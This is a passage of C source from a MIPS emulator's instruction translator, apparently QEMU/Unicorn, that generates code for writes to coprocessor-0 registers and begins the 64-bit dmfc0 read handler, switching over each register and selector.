0) { check_insn(ctx, ISA_MIPS32); } if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } switch (reg) { case CP0_REGISTER_00: switch (sel) { case CP0_REG00__INDEX: gen_helper_mtc0_index(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Index"; break; case CP0_REG00__MVPCONTROL: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_mvpcontrol(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MVPControl"; break; case CP0_REG00__MVPCONF0: CP0_CHECK(ctx->insn_flags & ASE_MT); /* ignored */ //register_name = "MVPConf0"; break; case CP0_REG00__MVPCONF1: CP0_CHECK(ctx->insn_flags & ASE_MT); /* ignored */ //register_name = "MVPConf1"; break; case CP0_REG00__VPCONTROL: CP0_CHECK(ctx->vp); /* ignored */ //register_name = "VPControl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_01: switch (sel) { case CP0_REG01__RANDOM: /* ignored */ //register_name = "Random"; break; case CP0_REG01__VPECONTROL: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_vpecontrol(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "VPEControl"; break; case CP0_REG01__VPECONF0: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_vpeconf0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "VPEConf0"; break; case CP0_REG01__VPECONF1: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_vpeconf1(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "VPEConf1"; break; case CP0_REG01__YQMASK: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_yqmask(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "YQMask"; break; case CP0_REG01__VPESCHEDULE: CP0_CHECK(ctx->insn_flags & ASE_MT); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPESchedule)); //register_name = "VPESchedule"; break; case CP0_REG01__VPESCHEFBACK: CP0_CHECK(ctx->insn_flags & ASE_MT); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPEScheFBack)); //register_name = "VPEScheFBack"; break; case CP0_REG01__VPEOPT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_vpeopt(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "VPEOpt"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_02: switch (sel) { case CP0_REG02__ENTRYLO0: gen_helper_mtc0_entrylo0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "EntryLo0"; break; case CP0_REG02__TCSTATUS: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcstatus(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCStatus"; break; case CP0_REG02__TCBIND: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcbind(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCBind"; break; case CP0_REG02__TCRESTART: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcrestart(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCRestart"; break; case CP0_REG02__TCHALT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tchalt(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCHalt"; break; case CP0_REG02__TCCONTEXT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tccontext(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCContext"; break; case CP0_REG02__TCSCHEDULE: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcschedule(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCSchedule"; break; case CP0_REG02__TCSCHEFBACK: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcschefback(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCScheFBack"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_03: switch (sel) { case CP0_REG03__ENTRYLO1: gen_helper_mtc0_entrylo1(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "EntryLo1"; break; case CP0_REG03__GLOBALNUM: CP0_CHECK(ctx->vp); /* ignored */ //register_name = "GlobalNumber"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_04: switch (sel) { case CP0_REG04__CONTEXT: gen_helper_mtc0_context(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Context"; break; case CP0_REG04__CONTEXTCONFIG: /* SmartMIPS ASE */ /* gen_helper_mtc0_contextconfig(tcg_ctx, arg); */ //register_name = "ContextConfig"; goto cp0_unimplemented; case CP0_REG04__USERLOCAL: CP0_CHECK(ctx->ulri); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); //register_name = "UserLocal"; break; case CP0_REG04__MMID: CP0_CHECK(ctx->mi); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_MemoryMapID)); //register_name = "MMID"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_05: switch (sel) { case CP0_REG05__PAGEMASK: gen_helper_mtc0_pagemask(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PageMask"; break; case CP0_REG05__PAGEGRAIN: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_pagegrain(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PageGrain"; ctx->base.is_jmp = DISAS_STOP; break; case CP0_REG05__SEGCTL0: CP0_CHECK(ctx->sc); gen_helper_mtc0_segctl0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SegCtl0"; break; case CP0_REG05__SEGCTL1: CP0_CHECK(ctx->sc); gen_helper_mtc0_segctl1(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SegCtl1"; break; case CP0_REG05__SEGCTL2: CP0_CHECK(ctx->sc); gen_helper_mtc0_segctl2(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SegCtl2"; break; case CP0_REG05__PWBASE: check_pw(ctx); gen_mtc0_store32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PWBase)); //register_name = "PWBase"; break; case CP0_REG05__PWFIELD: check_pw(ctx); gen_helper_mtc0_pwfield(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PWField"; break; case CP0_REG05__PWSIZE: check_pw(ctx); gen_helper_mtc0_pwsize(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PWSize"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_06: switch (sel) { case CP0_REG06__WIRED: gen_helper_mtc0_wired(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Wired"; break; case CP0_REG06__SRSCONF0: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf0"; break; case CP0_REG06__SRSCONF1: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf1(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf1"; break; case CP0_REG06__SRSCONF2: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf2(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf2"; break; case CP0_REG06__SRSCONF3: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf3(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf3"; break; case CP0_REG06__SRSCONF4: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf4(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf4"; break; case CP0_REG06__PWCTL: check_pw(ctx); gen_helper_mtc0_pwctl(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PWCtl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_07: switch (sel) { case CP0_REG07__HWRENA: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_hwrena(tcg_ctx, tcg_ctx->cpu_env, arg); ctx->base.is_jmp = DISAS_STOP; //register_name = "HWREna"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_08: switch (sel) { case CP0_REG08__BADVADDR: /* ignored */ //register_name = "BadVAddr"; break; case CP0_REG08__BADINSTR: /* ignored */ //register_name = "BadInstr"; break; case CP0_REG08__BADINSTRP: /* ignored */ //register_name = "BadInstrP"; break; case CP0_REG08__BADINSTRX: /* ignored */ //register_name = "BadInstrX"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_09: switch (sel) { case CP0_REG09__COUNT: gen_helper_mtc0_count(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Count"; break; case CP0_REG09__SAARI: CP0_CHECK(ctx->saar); gen_helper_mtc0_saari(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SAARI"; break; case CP0_REG09__SAAR: CP0_CHECK(ctx->saar); gen_helper_mtc0_saar(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SAAR"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_10: switch (sel) { case CP0_REG10__ENTRYHI: gen_helper_mtc0_entryhi(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "EntryHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_11: switch (sel) { case CP0_REG11__COMPARE: gen_helper_mtc0_compare(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Compare"; break; /* 6,7 are implementation dependent */ default: goto cp0_unimplemented; } break; case CP0_REGISTER_12: switch (sel) { case CP0_REG12__STATUS: save_cpu_state(ctx, 1); gen_helper_mtc0_status(tcg_ctx, tcg_ctx->cpu_env, arg); /* DISAS_STOP isn't good enough here, hflags may have changed. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; //register_name = "Status"; break; case CP0_REG12__INTCTL: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_intctl(tcg_ctx, tcg_ctx->cpu_env, arg); /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "IntCtl"; break; case CP0_REG12__SRSCTL: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsctl(tcg_ctx, tcg_ctx->cpu_env, arg); /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "SRSCtl"; break; case CP0_REG12__SRSMAP: check_insn(ctx, ISA_MIPS32R2); gen_mtc0_store32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSMap)); /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "SRSMap"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_13: switch (sel) { case CP0_REG13__CAUSE: save_cpu_state(ctx, 1); gen_helper_mtc0_cause(tcg_ctx, tcg_ctx->cpu_env, arg); /* * Stop translation as we may have triggered an interrupt. * DISAS_STOP isn't sufficient, we need to ensure we break out of * translated code to check for pending interrupts. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; //register_name = "Cause"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_14: switch (sel) { case CP0_REG14__EPC: tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EPC)); //register_name = "EPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_15: switch (sel) { case CP0_REG15__PRID: /* ignored */ //register_name = "PRid"; break; case CP0_REG15__EBASE: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_ebase(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "EBase"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_16: switch (sel) { case CP0_REG16__CONFIG: gen_helper_mtc0_config0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; case CP0_REG16__CONFIG1: /* ignored, read only */ //register_name = "Config1"; break; case CP0_REG16__CONFIG2: gen_helper_mtc0_config2(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config2"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; case CP0_REG16__CONFIG3: gen_helper_mtc0_config3(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config3"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; case CP0_REG16__CONFIG4: gen_helper_mtc0_config4(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config4"; ctx->base.is_jmp = DISAS_STOP; break; case CP0_REG16__CONFIG5: gen_helper_mtc0_config5(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config5"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; /* 6,7 are implementation dependent */ case CP0_REG16__CONFIG6: /* ignored */ //register_name = "Config6"; break; case CP0_REG16__CONFIG7: /* ignored */ //register_name = "Config7"; break; default: //register_name = "Invalid config selector"; goto cp0_unimplemented; } break; case CP0_REGISTER_17: switch (sel) { case CP0_REG17__LLADDR: gen_helper_mtc0_lladdr(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "LLAddr"; break; case CP0_REG17__MAAR: CP0_CHECK(ctx->mrp); gen_helper_mtc0_maar(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MAAR"; break; case CP0_REG17__MAARI: CP0_CHECK(ctx->mrp); gen_helper_mtc0_maari(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MAARI"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_18: switch (sel) { case CP0_REG18__WATCHLO0: case CP0_REG18__WATCHLO1: case CP0_REG18__WATCHLO2: case CP0_REG18__WATCHLO3: case CP0_REG18__WATCHLO4: case CP0_REG18__WATCHLO5: case CP0_REG18__WATCHLO6: case CP0_REG18__WATCHLO7: CP0_CHECK(ctx->CP0_Config1 & (1 << CP0C1_WR)); gen_helper_0e1i(mtc0_watchlo, arg, sel); //register_name = "WatchLo"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_19: switch (sel) { case CP0_REG19__WATCHHI0: case CP0_REG19__WATCHHI1: case CP0_REG19__WATCHHI2: case CP0_REG19__WATCHHI3: case CP0_REG19__WATCHHI4: case CP0_REG19__WATCHHI5: case CP0_REG19__WATCHHI6: case CP0_REG19__WATCHHI7: CP0_CHECK(ctx->CP0_Config1 & (1 << CP0C1_WR)); gen_helper_0e1i(mtc0_watchhi, arg, sel); //register_name = "WatchHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_20: switch (sel) { case CP0_REG20__XCONTEXT: #if defined(TARGET_MIPS64) check_insn(ctx, ISA_MIPS3); gen_helper_mtc0_xcontext(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "XContext"; break; #endif default: goto cp0_unimplemented; } break; case CP0_REGISTER_21: /* Officially reserved, but sel 0 is used for R1x000 framemask */ CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); switch (sel) { case 0: gen_helper_mtc0_framemask(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Framemask"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_22: /* ignored */ //register_name = "Diagnostic"; /* implementation dependent */ break; case CP0_REGISTER_23: switch (sel) { case CP0_REG23__DEBUG: gen_helper_mtc0_debug(tcg_ctx, tcg_ctx->cpu_env, arg); /* EJTAG support */ /* DISAS_STOP isn't good enough here, hflags may have changed. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; //register_name = "Debug"; break; case CP0_REG23__TRACECONTROL: /* PDtrace support */ /* gen_helper_mtc0_tracecontrol(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "TraceControl"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; goto cp0_unimplemented; case CP0_REG23__TRACECONTROL2: /* PDtrace support */ /* gen_helper_mtc0_tracecontrol2(tcg_ctx, tcg_ctx->cpu_env, arg); */ //register_name = "TraceControl2"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; goto cp0_unimplemented; case CP0_REG23__USERTRACEDATA1: /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; /* PDtrace support */ /* gen_helper_mtc0_usertracedata1(tcg_ctx, tcg_ctx->cpu_env, arg);*/ //register_name = "UserTraceData"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; goto cp0_unimplemented; case CP0_REG23__TRACEIBPC: /* PDtrace support */ /* gen_helper_mtc0_traceibpc(tcg_ctxtcg_ctx, ->cpu_env, arg); */ /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "TraceIBPC"; goto cp0_unimplemented; case CP0_REG23__TRACEDBPC: /* PDtrace support */ /* gen_helper_mtc0_tracedbpc(tcg_ctx, tcg_ctx->cpu_env, arg); */ /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "TraceDBPC"; goto cp0_unimplemented; default: goto cp0_unimplemented; } break; case CP0_REGISTER_24: switch (sel) { case CP0_REG24__DEPC: /* EJTAG support */ tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_DEPC)); //register_name = "DEPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_25: switch (sel) { case CP0_REG25__PERFCTL0: gen_helper_mtc0_performance0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Performance0"; break; case CP0_REG25__PERFCNT0: /* gen_helper_mtc0_performance1(tcg_ctx, arg); */ //register_name = "Performance1"; goto cp0_unimplemented; case CP0_REG25__PERFCTL1: /* gen_helper_mtc0_performance2(tcg_ctx, arg); */ //register_name = "Performance2"; goto cp0_unimplemented; case CP0_REG25__PERFCNT1: /* gen_helper_mtc0_performance3(tcg_ctx, arg); */ //register_name = "Performance3"; goto cp0_unimplemented; case CP0_REG25__PERFCTL2: /* gen_helper_mtc0_performance4(tcg_ctx, arg); */ //register_name = "Performance4"; goto cp0_unimplemented; case CP0_REG25__PERFCNT2: /* gen_helper_mtc0_performance5(tcg_ctx, arg); */ //register_name = "Performance5"; goto cp0_unimplemented; case CP0_REG25__PERFCTL3: /* gen_helper_mtc0_performance6(tcg_ctx, arg); */ //register_name = "Performance6"; goto cp0_unimplemented; case CP0_REG25__PERFCNT3: /* gen_helper_mtc0_performance7(tcg_ctx, arg); */ //register_name = "Performance7"; goto cp0_unimplemented; default: goto cp0_unimplemented; } break; case CP0_REGISTER_26: switch (sel) { case CP0_REG26__ERRCTL: gen_helper_mtc0_errctl(tcg_ctx, tcg_ctx->cpu_env, arg); ctx->base.is_jmp = DISAS_STOP; //register_name = "ErrCtl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_27: switch (sel) { case CP0_REG27__CACHERR: /* ignored */ //register_name = "CacheErr"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_28: switch (sel) { case CP0_REG28__TAGLO: case CP0_REG28__TAGLO1: case CP0_REG28__TAGLO2: case CP0_REG28__TAGLO3: gen_helper_mtc0_taglo(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TagLo"; break; case CP0_REG28__DATALO: case CP0_REG28__DATALO1: case CP0_REG28__DATALO2: case CP0_REG28__DATALO3: gen_helper_mtc0_datalo(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "DataLo"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_29: switch (sel) { case CP0_REG29__TAGHI: case CP0_REG29__TAGHI1: case CP0_REG29__TAGHI2: case CP0_REG29__TAGHI3: gen_helper_mtc0_taghi(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TagHi"; break; case CP0_REG29__DATAHI: case CP0_REG29__DATAHI1: case CP0_REG29__DATAHI2: case CP0_REG29__DATAHI3: gen_helper_mtc0_datahi(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "DataHi"; break; default: //register_name = "invalid sel"; goto cp0_unimplemented; } break; case CP0_REGISTER_30: switch (sel) { case CP0_REG30__ERROREPC: tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_ErrorEPC)); //register_name = "ErrorEPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_31: switch (sel) { case CP0_REG31__DESAVE: /* EJTAG support */ gen_mtc0_store32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_DESAVE)); //register_name = "DESAVE"; break; case CP0_REG31__KSCRATCH1: case CP0_REG31__KSCRATCH2: case CP0_REG31__KSCRATCH3: case CP0_REG31__KSCRATCH4: case CP0_REG31__KSCRATCH5: case CP0_REG31__KSCRATCH6: CP0_CHECK(ctx->kscrexist & (1 << sel)); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_KScratch[sel - 2])); //register_name = "KScratch"; break; default: goto cp0_unimplemented; } break; default: goto cp0_unimplemented; } /* For simplicity assume that all writes can cause interrupts. */ if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { /* * DISAS_STOP isn't sufficient, we need to ensure we break out of * translated code to check for pending interrupts. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; } return; cp0_unimplemented: //qemu_log_mask(LOG_UNIMP, "mtc0 %s (reg %d sel %d)\n", //register_name, reg, sel); return; } #if defined(TARGET_MIPS64) static void gen_dmfc0(DisasContext *ctx, TCGv arg, int reg, int sel) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; //const char *register_name = "invalid"; if (sel != 0) { check_insn(ctx, ISA_MIPS64); } switch (reg) { case CP0_REGISTER_00: switch (sel) { case CP0_REG00__INDEX: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Index)); //register_name = "Index"; break; case CP0_REG00__MVPCONTROL: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_mvpcontrol(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MVPControl"; break; case CP0_REG00__MVPCONF0: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_mvpconf0(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MVPConf0"; break; case CP0_REG00__MVPCONF1: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_mvpconf1(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MVPConf1"; break; case CP0_REG00__VPCONTROL: CP0_CHECK(ctx->vp); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPControl)); //register_name = "VPControl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_01: switch (sel) { case CP0_REG01__RANDOM: CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); gen_helper_mfc0_random(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "Random"; break; case CP0_REG01__VPECONTROL: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEControl)); //register_name = "VPEControl"; break; case CP0_REG01__VPECONF0: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEConf0)); //register_name = "VPEConf0"; break; case CP0_REG01__VPECONF1: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEConf1)); //register_name = "VPEConf1"; break; case CP0_REG01__YQMASK: CP0_CHECK(ctx->insn_flags & ASE_MT); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_YQMask)); //register_name = "YQMask"; break; case CP0_REG01__VPESCHEDULE: CP0_CHECK(ctx->insn_flags & ASE_MT); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPESchedule)); //register_name = "VPESchedule"; break; case CP0_REG01__VPESCHEFBACK: CP0_CHECK(ctx->insn_flags & ASE_MT); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPEScheFBack)); //register_name = "VPEScheFBack"; break; case CP0_REG01__VPEOPT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEOpt)); //register_name = "VPEOpt"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_02: switch (sel) { case CP0_REG02__ENTRYLO0: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryLo0)); //register_name = "EntryLo0"; break; case CP0_REG02__TCSTATUS: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tcstatus(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCStatus"; break; case CP0_REG02__TCBIND: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tcbind(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCBind"; break; case CP0_REG02__TCRESTART: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_dmfc0_tcrestart(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCRestart"; break; case CP0_REG02__TCHALT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_dmfc0_tchalt(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCHalt"; break; case CP0_REG02__TCCONTEXT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_dmfc0_tccontext(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCContext"; break; case CP0_REG02__TCSCHEDULE: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_dmfc0_tcschedule(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCSchedule"; break; case CP0_REG02__TCSCHEFBACK: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_dmfc0_tcschefback(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCScheFBack"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_03: switch (sel) { case CP0_REG03__ENTRYLO1: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryLo1)); //register_name = "EntryLo1"; break; case CP0_REG03__GLOBALNUM: CP0_CHECK(ctx->vp); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_GlobalNumber)); //register_name = "GlobalNumber"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_04: switch (sel) { case CP0_REG04__CONTEXT: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_Context)); //register_name = "Context"; break; case CP0_REG04__CONTEXTCONFIG: /* SmartMIPS ASE */ /* gen_helper_dmfc0_contextconfig(tcg_ctx, arg); */ //register_name = "ContextConfig"; goto cp0_unimplemented; case CP0_REG04__USERLOCAL: CP0_CHECK(ctx->ulri); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); //register_name = "UserLocal"; break; case CP0_REG04__MMID: CP0_CHECK(ctx->mi); gen_helper_mtc0_memorymapid(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MMID"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_05: switch (sel) { case CP0_REG05__PAGEMASK: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PageMask)); //register_name = "PageMask"; break; case CP0_REG05__PAGEGRAIN: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PageGrain)); //register_name = "PageGrain"; break; case CP0_REG05__SEGCTL0: CP0_CHECK(ctx->sc); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SegCtl0)); //register_name = "SegCtl0"; break; case CP0_REG05__SEGCTL1: CP0_CHECK(ctx->sc); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SegCtl1)); //register_name = "SegCtl1"; break; case CP0_REG05__SEGCTL2: CP0_CHECK(ctx->sc); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SegCtl2)); //register_name = "SegCtl2"; break; case CP0_REG05__PWBASE: check_pw(ctx); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_PWBase)); //register_name = "PWBase"; break; case CP0_REG05__PWFIELD: check_pw(ctx); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_PWField)); //register_name = "PWField"; break; case CP0_REG05__PWSIZE: check_pw(ctx); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_PWSize)); //register_name = "PWSize"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_06: switch (sel) { case CP0_REG06__WIRED: gen_mfc0_load32(tcg_ctx, 